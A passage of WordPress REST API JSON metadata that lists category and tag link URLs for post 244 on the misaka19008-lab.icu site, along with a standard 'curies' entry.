:"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=244"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=244"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}